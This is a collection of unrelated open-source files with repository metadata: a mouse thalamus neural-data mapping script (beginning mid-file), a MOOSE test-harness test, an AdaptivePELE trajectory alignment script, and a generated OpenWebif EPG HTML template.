binsize*(nbins+1), binsize) - (nbins*binsize)/2 swr = swr.loc[:,times] # CHECK FOR NAN tmp1 = swr.index[swr.isnull().any(1).values] # copy and delete if len(tmp1): swr_modth = swr.drop(tmp1) ############################################################################################################### # MOVIE + jPCA for each animal ############################################################################################################### mouses = ['Mouse12', 'Mouse17', 'Mouse20', 'Mouse32'] # times = np.arange(0, 1005, 5) - 500 # BAD interval_to_cut = { 'Mouse12':[89,128], 'Mouse17':[84,123], 'Mouse20':[92,131], 'Mouse32':[80,125]} rXX = dict.fromkeys(mouses) maps = dict.fromkeys(mouses) headdir = dict.fromkeys(mouses) adnloc = dict.fromkeys(mouses) xpos = dict.fromkeys(mouses) ypos = dict.fromkeys(mouses) xpos_shank = dict.fromkeys(mouses) ypos_shank = dict.fromkeys(mouses) xpos_phase = dict.fromkeys(mouses) ypos_phase = dict.fromkeys(mouses) for m in mouses: depth = pd.DataFrame(index = np.genfromtxt(data_directory+m+"/"+m+".depth", dtype = 'str', usecols = 0), data = np.genfromtxt(data_directory+m+"/"+m+".depth", usecols = 1), columns = ['depth']) neurons = np.array([n for n in swr_modth.index if m in n]) rX,phi_swr,dynamical_system = jPCA(swr_modth.loc[neurons].values, times) phi_swr = pd.DataFrame(index = swr_modth.loc[neurons].index, data = phi_swr) sessions = np.unique([n.split("_")[0] for n in neurons]) swr_shank = np.zeros((len(sessions),8,len(times))) nb_bins = interval_to_cut[m][1] - interval_to_cut[m][0] theta_shank = np.zeros((len(sessions),8,nb_bins)) # that's radian bins here spindle_shank = np.zeros((len(sessions),8,nb_bins)) # that's radian bins here bins_phase = np.linspace(-np.pi, np.pi+0.00001, nb_bins+1) # positive and negative modulation for each mouse # bornsup = np.percentile(swr_modth.loc[neurons], 70) # borninf = np.percentile(swr_modth.loc[neurons], 30) bornsup = 0.0 borninf = 0.0 neurons_pos = np.array([n for n in swr_modth.index if m in n and swr_modth.loc[n,0] > bornsup]) neurons_neg = np.array([n for n in swr_modth.index if m in n and swr_modth.loc[n,0] < borninf]) count_positive = np.zeros((len(sessions),8)) count_negative = np.zeros((len(sessions),8)) count_total = np.zeros((len(sessions),8)) hd_neurons = np.zeros((len(sessions),8)) amplitute = np.zeros((len(sessions),8)) phase_shank = np.zeros((len(sessions),8)) kappa_shank = np.zeros((len(sessions),8)) coherence_shank = np.zeros((len(sessions),8)) # map neuron to a session and a shank with a dual index for s in sessions: shank = loadShankMapping(data_directory+m+'/'+s+'/Analysis/SpikeData.mat').flatten() shankIndex = np.array([shank[int(n.split("_")[1])]-1 for n in neurons if s in n]) if np.max(shankIndex) > 8 : sys.exit("Invalid shank index for thalamus" + s) hd_info = scipy.io.loadmat(data_directory+m+'/'+s+'/Analysis/HDCells.mat')['hdCellStats'][:,-1] hd_info_neuron = np.array([hd_info[int(n.split("_")[1])] for n in neurons if s in n]) neurons_in_session = np.array([n for n in neurons if s in n]) shank_to_neurons = {k:[n for n in neurons_in_session[shankIndex == k]] for k in np.unique(shankIndex)} ########################################################################################################### # SWR MOD ########################################################################################################### for k in shank_to_neurons.keys(): count_total[np.where(sessions== s)[0][0],k] = len(shank_to_neurons[k]) hd_neurons[np.where(sessions== s)[0][0],k] = np.sum(hd_info_neuron[shankIndex == k]) amplitute[np.where(sessions==s)[0][0],k] = (swr_modth.loc[shank_to_neurons[k]].var(1)).mean() mu_, kappa_, pval_ = getCircularMean(phi_swr.loc[shank_to_neurons[k]].values.flatten(), 2*np.pi, 0.0) phase_shank[np.where(sessions==s)[0][0],k] = mu_ if np.isnan(mu_): sys.exit("mu_") kappa_shank[np.where(sessions==s)[0][0],k] = kappa_ coherence_shank[np.where(sessions==s)[0][0],k] = getPhaseCoherence(phi_swr.loc[shank_to_neurons[k]].values.flatten()) for t in range(len(times)): swr_shank[np.where(sessions== s)[0][0],k,t] = np.mean(swr_modth.loc[shank_to_neurons[k],times[t]]) # positive swr mod neurons_pos_in_session = np.array([n for n in neurons_pos if s in n]) shankIndex_pos = np.array([shank[int(n.split("_")[1])]-1 for n in neurons_pos_in_session]) shank_to_neurons_pos = {k:[n for n in neurons_pos_in_session[shankIndex_pos == k]] for k in np.unique(shankIndex_pos)} for k in shank_to_neurons_pos.keys(): count_positive[np.where(sessions== s)[0][0],k] = float(len(shank_to_neurons_pos[k])) # negative swr mod neurons_neg_in_session = np.array([n for n in neurons_neg if s in n]) shankIndex_neg = np.array([shank[int(n.split("_")[1])]-1 for n in neurons_neg_in_session]) shank_to_neurons_neg = {k:[n for n in neurons_neg_in_session[shankIndex_neg == k]] for k in np.unique(shankIndex_neg)} for k in shank_to_neurons_neg.keys(): count_negative[np.where(sessions== s)[0][0],k] = float(len(shank_to_neurons_neg[k])) phase_shank = np.flip(phase_shank, 1) amplitute = np.flip(amplitute, 1) kappa_shank = np.flip(kappa_shank, 1) coherence_shank = np.flip(coherence_shank, 1) # normalize by number of neurons per shanks count_positive = count_positive/(count_total+1.0) count_negative = count_negative/(count_total+1.0) hd_neurons = hd_neurons/(count_total+1.0) rXX[m] = rX maps[m] = { 'positive': np.flip(count_positive,1) , 'negative': np.flip(count_negative ,1), 'total': np.flip(count_total ,1), 'amplitute': amplitute , 'phase': phase_shank , 'kappa': kappa_shank , 'coherence': coherence_shank , 'x' : np.arange(0.0, 8*0.2, 0.2), 'y' : depth.loc[sessions].values.flatten() } headdir[m] = np.flip(hd_neurons, 1) # # where is adn # ind_max = np.where(hd_neurons == np.max(hd_neurons)) # adnloc[m] = [ypos[m][ind_max[0][0]], xpos[m][ind_max[1][0]]] def interpolate(z, x, y, inter, bbox = None): xnew = np.arange(x.min(), x.max()+inter, inter) ynew = np.arange(y.min(), y.max()+inter, inter) if bbox == None: f = scipy.interpolate.RectBivariateSpline(y, x, z) else: f = scipy.interpolate.RectBivariateSpline(y, x, z, bbox = bbox) znew = f(ynew, xnew) return (xnew, ynew, znew) def filter_(z, n): from scipy.ndimage import gaussian_filter return gaussian_filter(z, n) def softmax(x, b1 = 20.0, b2 = 0.5): x -= x.min() x /= x.max() return 1.0/(1.0+np.exp(-(x-b2)*b1)) def get_rgb(mapH, mapV, mapS, bound, m): beta_total = { 'Mouse12':[40.0,0.25], 'Mouse17':[40.0,0.2], 'Mouse20':[40.0,0.2], 'Mouse32':[100.0,0.3]} beta_coh = { 'Mouse12':[50.0,0.3], 'Mouse17':[20.0,0.3], 'Mouse20':[20.0,0.3], 'Mouse32':[90.0,0.4]} # mapH : phase # mapV : total # mapS : coherence from matplotlib.colors import hsv_to_rgb mapH -= mapH.min() mapH /= mapH.max() mapV -= mapV.min() mapV /= mapV.max() mapS -= mapS.min() mapS /= mapS.max() mapV = softmax(mapV, beta_total[m][0], beta_total[m][1]) mapS = softmax(mapS, beta_coh[m][0], beta_coh[m][1]) H = (1-mapH)*bound S = mapS V = mapV HSV = np.dstack((H,S,V)) RGB = hsv_to_rgb(HSV) return RGB for m in mouses: figure() interval = 0.01 xnew, ynew, amp = interpolate(maps[m]['amplitute'].copy(), maps[m]['x'], maps[m]['y'], interval) xnew, ynew, total = interpolate(maps[m]['total'].copy(), maps[m]['x'], maps[m]['y'], interval) xnew, ynew, sinn = interpolate(np.sin(maps[m]['phase'].copy()), maps[m]['x'], maps[m]['y'], interval) xnew, ynew, coss = interpolate(np.cos(maps[m]['phase'].copy()), maps[m]['x'], maps[m]['y'], interval) xnew, ynew, coh = interpolate(maps[m]['coherence'].copy(), maps[m]['x'], maps[m]['y'], interval) xnew, ynew, pos = interpolate(maps[m]['positive'].copy(), maps[m]['x'], maps[m]['y'], interval) xnew, ynew, neg = interpolate(maps[m]['negative'].copy(), maps[m]['x'], maps[m]['y'], interval) xnew, ynew, head = interpolate(headdir[m].copy(), maps[m]['x'], maps[m]['y'], inteval) imshow(get_rgb(phi.copy(), total.copy(), np.ones_like(pos), 0.83, m), aspect = 'equal',origin = 'upper', extent = (xnew[0], xnew[-1], ynew[-1], ynew[0])) head[head < np.percentile(head, 90)] = 0.0 contour(head, aspect = 'equal',origin = 'upper', extent = (xnew[0], xnew[-1], ynew[-1], ynew[0])) savefig("../figures/map_modulation_"+m+".pdf") sys.exit() sys.exit() # arrows for m in mouses: figure() xnew, ynew, amp = interpolate(maps[m]['amplitute'].copy(), maps[m]['x'], maps[m]['y'], 0.01) amp = filter_(amp, 5) xnew, ynew, total = interpolate(maps[m]['total'].copy(), maps[m]['x'], maps[m]['y'], 0.01) total = filter_(total, 5) xnew, ynew, coh = interpolate(maps[m]['coherence'].copy(), maps[m]['x'], maps[m]['y'], 0.01) coh = filter_(coh, 5) imshow(get_rgb(amp.copy(), total.copy(), coh.copy(), 0.83), aspect = 'equal',origin = 'upper', extent = (xnew[0], xnew[-1], ynew[-1], ynew[0])) xnew, ynew, sinn = interpolate(np.sin(maps[m]['phase'].copy()), maps[m]['x'], maps[m]['y'], 0.06) xnew, ynew, coss = interpolate(np.cos(maps[m]['phase'].copy()), maps[m]['x'], maps[m]['y'], 0.06) xnew, ynew, coh = interpolate(maps[m]['coherence'].copy(), maps[m]['x'], maps[m]['y'], 0.06) coh = filter_(coh, 5) X, Y = np.meshgrid(xnew, ynew) quiver(X, Y, coss*coh, sinn*coh, units = 'xy', linewidth = 100) xnew, ynew, head = interpolate(headdir[m].copy(), maps[m]['x'], maps[m]['y'], 0.01) head[head < np.percentile(head, 90)] = 0.0 contour(head, aspect = 'equal',origin = 'upper', extent = (xnew[0], xnew[-1], ynew[-1], ynew[0])) # savefig("../figures/map_phase_"+m+".pdf") # from matplotlib import animation, rc # from IPython.display import HTML, Image # m = mouses[0] # rc('animation', html='html5') # fig, axes = plt.subplots(1,3) # images1 = [] # for i,e in zip(range(3),['swr','spindle','theta']): # images1.append(axes[i].imshow(movies[m][e][0], aspect = 'equal', cmap = 'jet')) # axes[i].set_title(e) # def init(): # for i,e in zip(range(3),['swr','spindle','theta']): # images1[i].set_data(movies[m][e][0]) # return images1 # def animate(t): # for i,e in zip(range(3),['swr','spindle','theta']): # images1[i].set_data(movies[m][e][t]) # return images1 # anim = animation.FuncAnimation(fig, animate, init_func=init, # frames=interval_to_cut[m][1]-interval_to_cut[m][0], interval=0, blit=True, repeat_delay = 0) # show() # anim.save('../figures/animation_swr_mod_jpca.gif', writer='imagemagick', fps=60) #################################################################################### # MAPS #################################################################################### # figure(figsize = (16,10)) # for i, m in zip(range(len(mouses)), mouses): # subplot(1,4,i+1) m = 'Mouse12' imshow(get_rgb(maps[m]['amplitute'].copy(), maps[m]['total'].copy()), aspect = 'equal',origin = 'upper', extent = (xpos[m][0], xpos[m][-1], ypos[m][-1], ypos[m][0])) xticks(xpos[m][np.arange(0, maps[m]['amplitute'].shape[1],20)]) yticks(ypos[m][np.arange(0, maps[m]['amplitute'].shape[0],20)]) X, Y = np.meshgrid(xpos_phase[m], ypos_phase[m]) quiver(X, Y, np.cos(maps[m]['phase'])*maps[m]['coherence'], np.sin(maps[m]['phase'])*maps[m]['coherence']) headdir[m][headdir[m] < np.percentile(headdir[m], 80)] = 0.0 contour(headdir[m]) show() sys.exit() title(m) savefig("../figures/map_mouse12_phase.pdf") # savefig("../figures/map_swr_density_neurons.pdf") show() sys.exit() figure(figsize = (16,10)) for i, m in zip(range(len(mouses)), mouses): subplot(2,4,i+1) imshow(get_rgb(maps[m]['positive'], maps[m]['total']), aspect = 'equal') headdir[m][headdir[m] < np.percentile(headdir[m], 80)] = 0.0 contour(headdir[m]) xticks(np.arange(0, maps[m]['positive'].shape[1],20), xpos[m][np.arange(0, maps[m]['positive'].shape[1],20)]) yticks(np.arange(0, maps[m]['positive'].shape[0],20), ypos[m][np.arange(0, maps[m]['positive'].shape[0],20)]) title(m) subplot(2,4,i+5) imshow(get_rgb(maps[m]['negative'], maps[m]['total']), aspect = 'equal') contour(headdir[m]) xticks(np.arange(0, maps[m]['negative'].shape[1],20), xpos[m][np.arange(0, maps[m]['negative'].shape[1],20)]) yticks(np.arange(0, maps[m]['negative'].shape[0],20), ypos[m][np.arange(0, maps[m]['negative'].shape[0],20)]) savefig("../figures/map_swr_density_neurons.pdf") show() figure(figsize = (16,10)) for i, m in zip(range(len(mouses)), mouses): subplot(1,4,i+1) imshow(headdir[m], cmap = 'jet', aspect = 'equal') xticks(np.arange(0, headdir[m].shape[1],20), xpos[m][np.arange(0, headdir[m].shape[1],20)]) yticks(np.arange(0, headdir[m].shape[0],20), ypos[m][np.arange(0, headdir[m].shape[0],20)]) title(m+"\n y="+str(np.around(adnloc[m][0],2))+"\n"+"x="+str(np.around(adnloc[m][1],2))) savefig("../figures/map_adn_location.pdf") show() # SWR MOD from matplotlib import animation, rc from IPython.display import HTML, Image rc('animation', html='html5') fig, axes = plt.subplots(2,4) lines1 = [] lines2 = [] images = [] for i in range(len(mouses)): lines1.append(axes[0,i].plot([],[],'o-')[0]) lines2.append(axes[0,i].plot([],[],'o-')[0]) axes[0,i].set_xlim(-500, 500) axes[0,i].set_ylim(rXX[mouses[i]].min(), rXX[mouses[i]].max()) images.append(axes[1,i].imshow(movies[mouses[i]][0], aspect = 'auto', cmap = 'jet')) def init(): for i, m in zip(range(len(mouses)), mouses): images[i].set_data(movies[m][0]) lines1[i].set_data(times[0], rXX[m][0,0]) lines2[i].set_data(times[0], rXX[m][0,1]) return images+lines1+lines2 def animate(t): for i, m in zip(range(len(mouses)), mouses): images[i].set_data(movies[m][t]) lines1[i].set_data(times[0:t], rXX[m][0:t,0]) lines2[i].set_data(times[0:t], rXX[m][0:t,1]) return images+lines1+lines2 anim = animation.FuncAnimation(fig, animate, init_func=init, frames=len(movie), interval=10, blit=True, repeat_delay = 1000) show() # anim.save('../figures/animation_swr_mod_jpca.gif', writer='imagemagick', fps=60)
gviejo/ThalamusPhysio
python/main_make_map_pos_neg.py
Python
gpl-3.0
16,953
[ "NEURON" ]
3fe47c92c72fa1abbff62c5afda7e6ad1ff54c762d967311a530014d29398c40
#* This file is part of the MOOSE framework #* https://www.mooseframework.org #* #* All rights reserved, see COPYRIGHT for full restrictions #* https://github.com/idaholab/moose/blob/master/COPYRIGHT #* #* Licensed under LGPL 2.1, please see LICENSE for details #* https://www.gnu.org/licenses/lgpl-2.1.html import subprocess from TestHarnessTestCase import TestHarnessTestCase class TestHarnessTester(TestHarnessTestCase): def testDuplicateTestNames(self): """ Test for duplicate test names """ # Duplicate tests are considered a Fatal Parser Error, hence the 'with assertRaises' with self.assertRaises(subprocess.CalledProcessError) as cm: self.runTests('-i', 'duplicate_test_names', '--no-color') e = cm.exception self.assertRegexpMatches(e.output.decode('utf-8'), r'tests/test_harness.*? \[DUPLICATE TEST\] SKIP') self.assertRegexpMatches(e.output.decode('utf-8'), r'tests/test_harness.*?OK')
nuclear-wizard/moose
python/TestHarness/tests/test_DuplicateTestNames.py
Python
lgpl-2.1
981
[ "MOOSE" ]
ed5207065e2971a0cda91db02d57765e796b6d2391562531490da13ac882ca71
from __future__ import print_function import argparse import mdtraj as md import multiprocessing as mp import AdaptivePELE.analysis.trajectory_processing as tp def parseArguments(): desc = "Program that extracts residue coordinates for a posterior MSM analysis." parser = argparse.ArgumentParser(description=desc) parser.add_argument("--dont_image", action="store_false", help="Flag to set whether trajectories should be imaged before the alignment (if not specfied performs the imaging)") parser.add_argument("--offset", type=int, default=0, help="Offset to add to trajectory number") parser.add_argument("--processors", type=int, default=4, help="Number of cpus to use") parser.add_argument("resname", help="Ligand resname") parser.add_argument("reference", help="Reference structure") parser.add_argument("topology", help="Glob string for the topology") parser.add_argument("trajectories", help="Glob string for the trajectories") args = parser.parse_args() return args.trajectories, args.resname, args.topology, args.reference, args.processors, args.offset, args.dont_image def process_traj(traj, top, ligand_name, reference, num, image=True): reference = md.load(reference) reference = tp.dehidratate(reference) md_traj = md.load(traj, top=top) if image: md_traj = md_traj.image_molecules() nowat_traj = tp.dehidratate(md_traj) aligned_traj = nowat_traj.superpose(reference, frame=0, atom_indices=tp.extract_heavyatom_indexes(nowat_traj), ref_atom_indices=tp.extract_heavyatom_indexes(reference)) aligned_traj.save_xtc("trajectory_aligned_%s.xtc" % num) if num == 0: aligned_traj[0].save_pdb("top%s.pdb" % ligand_name) def main(trajectory_template, ligand_name, topology, reference, processors, off_set, image): pool = mp.Pool(processors) workers = [] num = off_set for traj, top in tp.load_trajs(trajectory_template, topology, PELE_order=True): print("Procesing %s num %s with top %s" % (traj, num, top)) workers.append(pool.apply_async(process_traj, args=(traj, top, ligand_name, reference, num, image))) num = num + 1 for worker in workers: worker.get() if __name__ == "__main__": trajectory_template, ligand_name, topology, reference, processors, off_set, image = parseArguments() main(trajectory_template, ligand_name, topology, reference, processors, off_set, image)
AdaptivePELE/AdaptivePELE
AdaptivePELE/analysis/dehidratate_and_align.py
Python
mit
2,438
[ "MDTraj" ]
1f51aaf596b9efaaa6532ca4b360d278c300d11005fef858649812305abc50a3
#!/usr/bin/env python ################################################## ## DEPENDENCIES import sys import os import os.path try: import builtins as builtin except ImportError: import __builtin__ as builtin from os.path import getmtime, exists import time import types from Cheetah.Version import MinCompatibleVersion as RequiredCheetahVersion from Cheetah.Version import MinCompatibleVersionTuple as RequiredCheetahVersionTuple from Cheetah.Template import Template from Cheetah.DummyTransaction import * from Cheetah.NameMapper import NotFound, valueForName, valueFromSearchList, valueFromFrameOrSearchList from Cheetah.CacheRegion import CacheRegion import Cheetah.Filters as Filters import Cheetah.ErrorCatchers as ErrorCatchers from urllib import quote from Plugins.Extensions.OpenWebif.local import tstrings from json import dumps from Plugins.Extensions.OpenWebif.controllers.views.ajax.renderevtblock import renderEvtBlock ################################################## ## MODULE CONSTANTS VFFSL=valueFromFrameOrSearchList VFSL=valueFromSearchList VFN=valueForName currentTime=time.time __CHEETAH_version__ = '2.4.4' __CHEETAH_versionTuple__ = (2, 4, 4, 'development', 0) __CHEETAH_genTime__ = 1453357629.949636 __CHEETAH_genTimestamp__ = 'Thu Jan 21 15:27:09 2016' __CHEETAH_src__ = '/home/babel/Build/Test/OpenPLi5/openpli5.0/build/tmp/work/tmnanoseplus-oe-linux/enigma2-plugin-extensions-openwebif/1+gitAUTOINC+186ea358f6-r0/git/plugin/controllers/views/ajax/multiepg2.tmpl' __CHEETAH_srcLastModified__ = 'Thu Jan 21 15:27:08 2016' __CHEETAH_docstring__ = 'Autogenerated by Cheetah: The Python-Powered Template Engine' if __CHEETAH_versionTuple__ < RequiredCheetahVersionTuple: raise AssertionError( 'This template was compiled with Cheetah version' ' %s. Templates compiled before version %s must be recompiled.'%( __CHEETAH_version__, RequiredCheetahVersion)) ################################################## ## CLASSES class multiepg2(Template): ################################################## ## CHEETAH GENERATED METHODS def __init__(self, *args, **KWs): super(multiepg2, self).__init__(*args, **KWs) if not self._CHEETAH__instanceInitialized: cheetahKWArgs = {} allowedKWs = 'searchList namespaces filter filtersLib errorCatcher'.split() for k,v in KWs.items(): if k in allowedKWs: cheetahKWArgs[k] = v self._initCheetahInstance(**cheetahKWArgs) def channelsInBouquet(self, **KWS): ## CHEETAH: generated from #block channelsInBouquet at line 73, col 1. trans = KWS.get("trans") if (not trans and not self._CHEETAH__isBuffering and not callable(self.transaction)): trans = self.transaction # is None unless self.awake() was called if not trans: trans = DummyTransaction() _dummyTrans = True else: _dummyTrans = False write = trans.response().write SL = self._CHEETAH__searchList _filter = self._CHEETAH__currentFilter ######################################## ## START - generated method body write(u'''<thead> <tr> ''') for sname, eventlist in VFN(VFFSL(SL,"events",True),"iteritems",False)(): # generated from line 76, col 2 write(u'''\t<th class="border"><div class="service"><img src="''') _v = VFFSL(SL,"picons",True)[VFFSL(SL,"sname",True)] # u'$(picons[$sname])' on line 77, col 52 if _v is not None: write(_filter(_v, rawExpr=u'$(picons[$sname])')) # from line 77, col 52. write(u'''" /> ''') _v = VFFSL(SL,"sname",True) # u'$sname' on line 77, col 74 if _v is not None: write(_filter(_v, rawExpr=u'$sname')) # from line 77, col 74. write(u'''</div></th> ''') write(u'''</tr> </thead> ''') ######################################## ## END - generated method body return _dummyTrans and trans.response().getvalue() or "" def respond(self, trans=None): ## CHEETAH: main method generated for this template if (not trans and not self._CHEETAH__isBuffering and not callable(self.transaction)): trans = self.transaction # is None unless self.awake() was called if not trans: trans = DummyTransaction() _dummyTrans = True else: _dummyTrans = False write = trans.response().write SL = self._CHEETAH__searchList _filter = self._CHEETAH__currentFilter ######################################## ## START - generated method body write(u''' <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="shortcut icon" href="../images/favicon.png"> <link rel="stylesheet" type="text/css" href="../css/style.min.css" /> <link type="text/css" href="../css/jquery-ui-1.8.18.custom.css" rel="stylesheet" />\t <script type="text/javascript" src="../js/jquery-1.6.2.min.js"></script> <script type="text/javascript" src="../js/jquery-ui-1.8.18.custom.min.js"></script> <script type="text/javascript" src="../js/openwebif-1.1.min.js"></script> <script type="text/javascript" src="../js/jquery.fixedheadertable.min.js"></script> <script type="text/javascript">initJsTranslation(''') _v = VFFSL(SL,"dumps",False)(VFFSL(SL,"tstrings",True)) # u'$dumps($tstrings)' on line 17, col 50 if _v is not None: write(_filter(_v, rawExpr=u'$dumps($tstrings)')) # from line 17, col 50. write(u''')</script> <title>Open Webif ''') _v = VFFSL(SL,"tstrings",True)['multi_epg'] # u"$tstrings['multi_epg']" on line 19, col 19 if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['multi_epg']")) # from line 19, col 19. write(u'''</title> </head> <body> <style> body {background-image: none;background-color: #FFF; } #tvcontent {padding:0px;} table { font-family: Verdana; font-size: 11px; } tr { vertical-align: top } .service { font-weight: bold; font-size: 12px; color:#fff; background-color: #1c47ae; line-height:30px; padding: 3px; white-space: nowrap; overflow: hidden; width: 184px} .service img { width:50px; height:30px; float:left; margin-right:10px; } .title { font-weight: bold; color: #061c37; } .desc { font-size: 10px; color: #176093; } .even { background-color: #dfeffc; } .border { border-right: 1px solid #4297d7; } .event { cursor: pointer; width: 190px; overflow:hidden; } .bq { background-color: #1c478e; font-size: 11px; font-weight: bold; color: #fff; padding: 2px 4px; line-height: 18px; cursor: pointer; white-space: nowrap; display: inline-block; margin: 1px 1px; } .bq.selected { color: #A9D1FA; } .plus { background-color: #dfeffc; font-size: 13px; font-weight: bold; color: #1c478e; padding: 2px 4px; line-height: 21px; cursor: pointer; white-space: nowrap; } .plus.selected { color: #ea7409; } .timer { color: #f00; font-weight: bold; font-size: 10px; } .timer.disabled { color: #f80; } #eventdescription { width: 375px; height: auto; position: fixed; top: 205px; left: 350px; z-index: 1000; display: none; overflow: auto; } html, body, #tvcontent { width:100%; height:100%;} .fht-table,.fht-table thead,.fht-table tfoot,.fht-table tbody,.fht-table tr,.fht-table th,.fht-table td{font-size:100%;font:inherit;vertical-align:top;margin:0;padding:0} .fht-table{border-collapse:collapse;border-spacing:0} .fht-table-wrapper,.fht-table-wrapper .fht-thead,.fht-table-wrapper .fht-tfoot,.fht-table-wrapper .fht-fixed-column .fht-tbody,.fht-table-wrapper .fht-fixed-body .fht-tbody,.fht-table-wrapper .fht-tbody{overflow:hidden;position:relative} .fht-table-wrapper .fht-fixed-body .fht-tbody,.fht-table-wrapper .fht-tbody{overflow:auto} .fht-table-wrapper .fht-table .fht-cell{overflow:hidden;height:1px} .fht-table-wrapper .fht-fixed-column,.fht-table-wrapper .fht-fixed-body{top:0;left:0;position:absolute} .fht-table-wrapper .fht-fixed-column{z-index:1} #atdialog { width: 90%; height: auto; position: fixed; top: 10px; left: 10px; z-index: 1001; display: none; overflow: auto; } } </style> <div id="tvcontent"> <table style="margin:0"> <tr> ''') for slot in range(0,7): # generated from line 57, col 1 write(u'''\t<td class="plus ''') if VFFSL(SL,"slot",True)==VFFSL(SL,"day",True) : # generated from line 58, col 18 _v = 'selected' if _v is not None: write(_filter(_v)) else: _v = '' if _v is not None: write(_filter(_v)) write(u'''" js:day="''') _v = VFFSL(SL,"slot",True) # u'$(slot)' on line 58, col 69 if _v is not None: write(_filter(_v, rawExpr=u'$(slot)')) # from line 58, col 69. write(u'''">''') _v = VFFSL(SL,"tstrings",True)[("day_" + (time.strftime("%w", time.localtime(time.time()+86400*slot))))] # u'$tstrings[("day_" + (time.strftime("%w", time.localtime(time.time()+86400*slot))))]' on line 58, col 78 if _v is not None: write(_filter(_v, rawExpr=u'$tstrings[("day_" + (time.strftime("%w", time.localtime(time.time()+86400*slot))))]')) # from line 58, col 78. write(u'''</td> ''') write(u'''</tr> </table> <table> <tr> ''') for bq in VFFSL(SL,"bouquets",True): # generated from line 65, col 1 write(u'''<td class="bq ''') if VFFSL(SL,"bq",True)[0]==VFFSL(SL,"bref",True) : # generated from line 66, col 15 _v = 'selected' if _v is not None: write(_filter(_v)) else: _v = '' if _v is not None: write(_filter(_v)) write(u'''" js:ref="''') _v = VFFSL(SL,"quote",False)(VFFSL(SL,"bq",True)[0]) # u'$quote($bq[0])' on line 66, col 68 if _v is not None: write(_filter(_v, rawExpr=u'$quote($bq[0])')) # from line 66, col 68. write(u'''">''') _v = VFFSL(SL,"bq",True)[1] # u'$bq[1]' on line 66, col 84 if _v is not None: write(_filter(_v, rawExpr=u'$bq[1]')) # from line 66, col 84. write(u'''</td> ''') write(u'''</tr> </table> ''') renderEventBlock = VFFSL(SL,"renderEvtBlock",False)() write(u'''<table cellpadding="0" cellspacing="0" id="TBL1"> ''') self.channelsInBouquet(trans=trans) write(u'''<tbody> ''') hasEvents = False for slot in range(0,12): # generated from line 84, col 2 write(u'''<tr class="''') _v = VFFSL(SL,"slot",True)%2 and 'odd' or 'even' # u"$(slot%2 and 'odd' or 'even')" on line 85, col 12 if _v is not None: write(_filter(_v, rawExpr=u"$(slot%2 and 'odd' or 'even')")) # from line 85, col 12. write(u'''"> ''') for sname, eventlist in VFN(VFFSL(SL,"events",True),"iteritems",False)(): # generated from line 86, col 2 write(u'''<td class="border"> ''') for event in VFFSL(SL,"eventlist",True)[VFFSL(SL,"slot",True)]: # generated from line 88, col 2 write(u'''\t\t''') _v = VFN(VFFSL(SL,"renderEventBlock",True),"render",False)(VFFSL(SL,"event",True)) # u'$renderEventBlock.render($event)' on line 89, col 3 if _v is not None: write(_filter(_v, rawExpr=u'$renderEventBlock.render($event)')) # from line 89, col 3. write(u''' ''') hasEvents = True write(u'''</td> ''') write(u'''</tr> ''') write(u'''</tbody> </table> </div> <div id="eventdescription"></div> <div id="atdialog"> <div id="toolbar-header" class="athandle" style="height:30px;cursor:move"> <div id="leftmenu_expander_main" class="leftmenu_icon leftmenu_icon_collapse" onclick="$(\'#atdialog\').hide(200)"></div> </div> <div id="content_container"></div></div> ''') if VFFSL(SL,"reloadtimer",True)==1: # generated from line 105, col 1 write(u'''<div id="editTimerForm" title="''') _v = VFFSL(SL,"tstrings",True)['edit_timer'] # u"$tstrings['edit_timer']" on line 106, col 32 if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['edit_timer']")) # from line 106, col 32. write(u'''"></div> ''') write(u''' <script> var picons = ''') _v = VFFSL(SL,"dumps",False)(VFFSL(SL,"picons",True)) # u'$dumps($picons)' on line 110, col 14 if _v is not None: write(_filter(_v, rawExpr=u'$dumps($picons)')) # from line 110, col 14. write(u'''; var reloadTimers = false; $(".bq").click(function() { \tvar id = $(this).attr("js:ref"); \t$("#tvcontent").html(loadspinner).load(\'../ajax/multiepg2?reloadtimer=0&bref=\'+id); }); $(".event").click(function() { \tvar id = $(this).attr("js:id"); \tvar ref = $(this).attr("js:ref"); \t$("#eventdescription").load(\'../ajax/event?idev=\'+id+\'&sref=\'+escape(ref), function() { \t\t$("#eventdescription").show(200).draggable( { handle: ".handle" } ); \t}); }); $(".plus").click(function() { \tvar day = $(this).attr("js:day"); \t$("#tvcontent").html(loadspinner).load(\'../ajax/multiepg2?reloadtimer=0&bref=''') _v = VFFSL(SL,"quote",False)(VFFSL(SL,"bref",True)) # u'${quote($bref)}' on line 125, col 80 if _v is not None: write(_filter(_v, rawExpr=u'${quote($bref)}')) # from line 125, col 80. write(u"""&day='+day); }); $('#editTimerForm').load('../ajax/edittimer'); $('#TBL1').fixedHeaderTable({ \tfooter: true, \tcloneHeadToFoot: true, \taltClass: 'odd', \tautoShow: true }); </script> </body> </html> """) ######################################## ## END - generated method body return _dummyTrans and trans.response().getvalue() or "" ################################################## ## CHEETAH GENERATED ATTRIBUTES _CHEETAH__instanceInitialized = False _CHEETAH_version = __CHEETAH_version__ _CHEETAH_versionTuple = __CHEETAH_versionTuple__ _CHEETAH_genTime = __CHEETAH_genTime__ _CHEETAH_genTimestamp = __CHEETAH_genTimestamp__ _CHEETAH_src = __CHEETAH_src__ _CHEETAH_srcLastModified = __CHEETAH_srcLastModified__ _mainCheetahMethod_for_multiepg2= 'respond' ## END CLASS DEFINITION if not hasattr(multiepg2, '_initCheetahAttributes'): templateAPIClass = getattr(multiepg2, '_CHEETAH_templateClass', Template) templateAPIClass._addCheetahPlumbingCodeToClass(multiepg2) # CHEETAH was developed by Tavis Rudd and Mike Orr # with code, advice and input from many other volunteers. # For more information visit http://www.CheetahTemplate.org/ ################################################## ## if run from command line: if __name__ == '__main__': from Cheetah.TemplateCmdLineIface import CmdLineIface CmdLineIface(templateObj=multiepg2()).run()
MOA-2011/e2openplugin-OpenWebif
plugin/controllers/views/ajax/multiepg2.py
Python
gpl-2.0
15,057
[ "VisIt" ]
e665a8acecd0a4ab78f2ebe377e86e9c26eb7d68920e42d3ae76441ba86f70ac
